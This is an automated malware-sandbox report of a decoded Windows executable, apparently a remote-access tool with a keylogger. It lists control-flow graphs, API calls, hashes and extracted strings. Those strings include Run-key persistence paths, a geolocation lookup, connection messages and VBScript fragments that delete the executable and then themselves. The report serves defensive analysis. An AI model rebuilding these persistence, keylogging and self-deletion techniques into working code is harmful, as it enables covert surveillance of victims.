                                        control_flow_graph 447 413fd4-41401f call 401faa call 41aa83 call 401faa call 401d64 call 401e8f call 43a5f7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afd3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afd3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc86 call 404c9e call 401f66 call 41a696 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 583 414b54-414b66 call 4047eb call 4020b4 559->583 565 4142ca-4142df call 404915 call 40428c 560->565 566 41429f-4142c5 call 401f66 * 2 call 41a696 560->566 582 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 4 call 41a97d call 413683 call 4082dc call 440c61 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 565->582 565->583 566->583 647 414434-414441 call 40541d 582->647 648 414446-41446d call 401e8f call 412513 582->648 596 414b68-414b88 call 401d64 call 401e8f call 43a5f7 Sleep 583->596 597 414b8e-414b96 call 401d8c 583->597 596->597 597->476 647->648 654 414474-414830 call 403b40 call 40cbf1 call 41adfe call 41aed8 call 41ad56 call 401d64 GetTickCount call 41ad56 call 41acb0 call 41ad56 * 2 call 41ac62 call 41aed8 * 5 call 40e679 call 41aed8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c 648->654 655 41446f-414471 648->655 781 414832 call 404468 654->781 655->654 782 414837-414abb call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 781->782 900 414ac0-414ac7 782->900 901 414ac9-414ad0 900->901 902 414adb-414ae2 900->902 901->902 905 414ad2-414ad4 901->905 903 414ae4-414ae9 call 40a767 902->903 904 414aee-414b20 call 405415 call 401f66 * 2 call 41a696 902->904 903->904 916 414b22-414b2e CreateThread 904->916 917 414b34-414b4f call 401eea * 2 call 401e13 904->917 905->902 916->917 917->583
                                        APIs
                                        • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                        • WSAGetLastError.WS2_32 ref: 00414249
                                        • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$ErrorLastLocalTime
                                        • String ID: | $%I64u$5.3.0 Pro$@CG$@|$C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-IUHLZ9$TLS Off$TLS On $TUF$XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                        • API String ID: 524882891-3896684858
                                        • Opcode ID: d87e8caa7572595075e7298c32b86889769859a0b55a2115f334d47f6d2759e2
                                        • Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
                                        • Opcode Fuzzy Hash: d87e8caa7572595075e7298c32b86889769859a0b55a2115f334d47f6d2759e2
                                        • Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 924 40bf04-40bf1a call 411699 927 40bf26-40bf2f 924->927 928 40bf1c-40bf21 call 40afba 924->928 929 40bf31 call 418c18 927->929 930 40bf36-40bf3d 927->930 928->927 929->930 933 40bf50-40bf60 930->933 934 40bf3f-40bf4b call 401e07 call 41b43f 930->934 936 40bf62-40bf71 call 401e07 call 41297a 933->936 937 40bf77-40bf82 933->937 934->933 954 40bf76 936->954 940 40bf84-40bf90 call 401e07 call 41297a 937->940 941 40bf96-40bf9c 937->941 955 40bf95 940->955 943 40bfb3-40c007 call 436060 call 4022f8 call 401e8f * 2 call 41265d 941->943 944 40bf9e-40bfb2 call 401e07 call 41297a 941->944 966 40c019-40c047 call 401e8f RegDeleteKeyA call 406a1a 943->966 967 40c009-40c013 GetModuleFileNameW 943->967 944->943 954->937 955->941 972 40c058-40c11d SetFileAttributesW call 41ab48 call 41ae18 call 4028cf call 401e13 call 401eea call 43ac1f call 403b40 call 4028cf call 403cdc call 401e13 * 2 call 403b40 call 403cbb call 401e13 966->972 973 40c049-40c056 call 401e07 SetFileAttributesW 966->973 967->966 1004 40c176-40c1d0 call 403b40 call 4028cf * 2 call 402de3 call 401e13 * 3 972->1004 1005 40c11f-40c171 call 403b40 call 403cbb call 4028cf call 402de3 call 401e13 * 3 972->1005 973->972 1033 40c1e0-40c1f0 call 406a1a 1004->1033 1034 40c1d2-40c1db call 4082d2 1004->1034 1005->1004 1038 40c1f2-40c22a call 40b0dd call 4028cf call 402de3 call 401e13 * 2 1033->1038 1039 40c22f-40c26b call 4082d2 call 401e07 call 4022f8 call 401e07 call 41b59f 1033->1039 1034->1033 1038->1039 1059 40c286-40c287 ExitProcess 1039->1059 1060 40c26d-40c280 call 401e07 ShellExecuteW 1039->1060 1060->1059
                                        APIs
                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                          • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                          • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                        • ExitProcess.KERNEL32 ref: 0040C287
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                        • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                        • API String ID: 3797177996-1998216422
                                        • Opcode ID: b7c335a9a57edc8c0d96284173e756a4cf762b7bc0f9a63fe277658faa23f341
                                        • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                                        • Opcode Fuzzy Hash: b7c335a9a57edc8c0d96284173e756a4cf762b7bc0f9a63fe277658faa23f341
                                        • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E

                                        Control-flow Graph

                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 0040A456
                                        • Sleep.KERNEL32(000001F4), ref: 0040A461
                                        • GetForegroundWindow.USER32 ref: 0040A467
                                        • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                        • Sleep.KERNEL32(000003E8), ref: 0040A574
                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                        • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                                        • API String ID: 911427763-1497357211
                                        • Opcode ID: 04cc7eafda87e2f954416aa54820f6384b634bf120f851fbe548fbfea1a1b6bc
                                        • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                                        • Opcode Fuzzy Hash: 04cc7eafda87e2f954416aa54820f6384b634bf120f851fbe548fbfea1a1b6bc
                                        • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F

                                        Control-flow Graph

                                        APIs
                                        • Sleep.KERNEL32(00001388), ref: 00409E62
                                          • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                          • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                          • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                          • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                        • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                        • API String ID: 3795512280-3163867910
                                        • Opcode ID: 431120ea2e0ec05f5d77566325f4bfbe655a1002eb612d18d4f3077bf3784cb0
                                        • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                        • Opcode Fuzzy Hash: 431120ea2e0ec05f5d77566325f4bfbe655a1002eb612d18d4f3077bf3784cb0
                                        • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A

                                        Control-flow Graph

                                        APIs
                                        • connect.WS2_32(?,?,?), ref: 004042A5
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                        • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                        • API String ID: 994465650-2151626615
                                        • Opcode ID: 3ddcc2c8b25d131ed1d8981cf26e6009bfc8be3c208b881942b02508a6528955
                                        • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                        • Opcode Fuzzy Hash: 3ddcc2c8b25d131ed1d8981cf26e6009bfc8be3c208b881942b02508a6528955
                                        • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF

                                        Control-flow Graph

                                        APIs
                                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LongNamePath
                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                        • API String ID: 82841172-425784914
                                        • Opcode ID: 5638771ac5714ddadc0d5b1694dde0f121ac45befe08588207784c80853873f1
                                        • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                                        • Opcode Fuzzy Hash: 5638771ac5714ddadc0d5b1694dde0f121ac45befe08588207784c80853873f1
                                        • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                          • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                          • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                          • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                          • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                        • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseCurrentOpenQueryValueWow64
                                        • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                        • API String ID: 782494840-3211212173
                                        • Opcode ID: 26c60f6affbee6d217ba86e1928e9c23d3fea0a75ab30a776bd0b760c07e420e
                                        • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                                        • Opcode Fuzzy Hash: 26c60f6affbee6d217ba86e1928e9c23d3fea0a75ab30a776bd0b760c07e420e
                                        • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE

                                        Control-flow Graph

                                        APIs
                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                                        • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                                        • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                                        Strings
                                        • http://geoplugin.net/json.gp, xrefs: 0041A55E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleOpen$FileRead
                                        • String ID: http://geoplugin.net/json.gp
                                        • API String ID: 3121278467-91888290
                                        • Opcode ID: a574e59ae2a6d8659b3b708bfc28c48046a6cfc8e174729ee45d25f2e2c52857
                                        • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                                        • Opcode Fuzzy Hash: a574e59ae2a6d8659b3b708bfc28c48046a6cfc8e174729ee45d25f2e2c52857
                                        • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA

                                        Control-flow Graph

                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                        • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSizeSleep
                                        • String ID: `AG
                                        • API String ID: 1958988193-3058481221
                                        • Opcode ID: b0d5ab9d96485228d01e653f577d9a536d0e325b1c446dee4fcf46d6e6ae2c45
                                        • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                        • Opcode Fuzzy Hash: b0d5ab9d96485228d01e653f577d9a536d0e325b1c446dee4fcf46d6e6ae2c45
                                        • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D

                                        Control-flow Graph

                                        APIs
                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                        • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                        • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateValue
                                        • String ID: HgF$pth_unenc
                                        • API String ID: 1818849710-3662775637
                                        • Opcode ID: 1bd7bc63bfcb718f8a00b857ba0206b1347799401e36ec3cc1597cb67c32c774
                                        • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                        • Opcode Fuzzy Hash: 1bd7bc63bfcb718f8a00b857ba0206b1347799401e36ec3cc1597cb67c32c774
                                        • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                                        Control-flow Graph

                                        APIs
                                        • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread$LocalTimewsprintf
                                        • String ID: Offline Keylogger Started
                                        • API String ID: 465354869-4114347211
                                        • Opcode ID: 7dd086592dd2feb5cbf2408a3828b0047df0053d07ac6005fceb7baaed354c62
                                        • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                                        • Opcode Fuzzy Hash: 7dd086592dd2feb5cbf2408a3828b0047df0053d07ac6005fceb7baaed354c62
                                        • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                                        APIs
                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                        • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                        • RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
